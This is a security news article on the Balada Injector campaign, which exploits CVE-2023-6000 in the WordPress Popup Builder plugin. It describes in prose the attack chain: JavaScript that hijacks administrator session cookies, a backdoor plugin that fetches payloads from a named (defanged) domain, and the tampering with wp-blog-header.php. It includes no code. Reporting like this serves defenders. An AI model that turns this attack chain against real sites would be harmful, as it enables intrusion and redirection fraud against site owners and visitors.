Balada Injector Compromises More Than 7,100 WordPress Sites via Plugin Vulnerability

A significant cybersecurity incident has come to light involving the Popup Builder plugin used in WordPress, which has been compromised by a malware strain known as Balada Injector. This issue endangers thousands of WordPress websites operating on vulnerable versions of the plugin.

Initially documented by Doctor Web at the beginning of 2023, this ongoing campaign exploits a series of security vulnerabilities in WordPress plugins, primarily targeting site administrators. This exploitation allows attackers to inject backdoors that redirect users from infected sites to fraudulent tech support pages, bogus lottery winnings, and various push notification scams.

Further research by Sucuri has revealed the expansive nature of this operation, identifying it as being active since 2017 and affecting upwards of one million websites. This alarming trend underscores the growing sophistication of cyber threats targeting widely used web platforms.

GoDaddy’s security unit has recently reported observing new Balada Injector activity on December 13, 2023, discovering malicious injections across more than 7,100 sites. The security breach exploits a critical vulnerability in Popup Builder, designated as CVE-2023-6000, with a CVSS score of 8.8. This plugin, which boasts over 200,000 active installations, had its vulnerability disclosed by WPScan just one day prior to the attack.

According to WPScan researcher Marc Montpas, the implications of this vulnerability are severe. When exploited, it grants the attacker the ability to execute any action permitted to a logged-in administrator, including the installation of unauthorized plugins and the creation of rogue administrative accounts.

The primary motive behind the Balada Injector campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com. This file is designed to hijack control of the compromised website and load additional scripts to facilitate further malicious redirects. The attackers maintain persistent access by uploading backdoors, implementing harmful plugins, and establishing illicit administrator accounts.

The strategy employed includes specifically targeting logged-in administrators by injecting JavaScript to mimic their actions, leveraging their session cookies to perform administrative tasks without additional authentication. This is a prime example of how adversaries utilize the tactic of initial access followed by persistence within the MITRE ATT&CK framework.

Once the new wave of attacks was triggered, it aimed to exploit administrator cookies to deploy a backdoor plugin (“wp-felody.php” or “Wp Felody”) that fetches a subsequent payload from the mentioned domain. This payload is another backdoor dubbed “sasas,” which is temporarily stored and executed before being erased.

Ultimately, the attack modifies the site’s wp-blog-header.php file to reintegrate the original Balada JavaScript malware, allowing attackers to remain undetected while maintaining control. This level of manipulation reflects a deep understanding of WordPress architecture and the potential to exploit vulnerabilities for malicious purposes.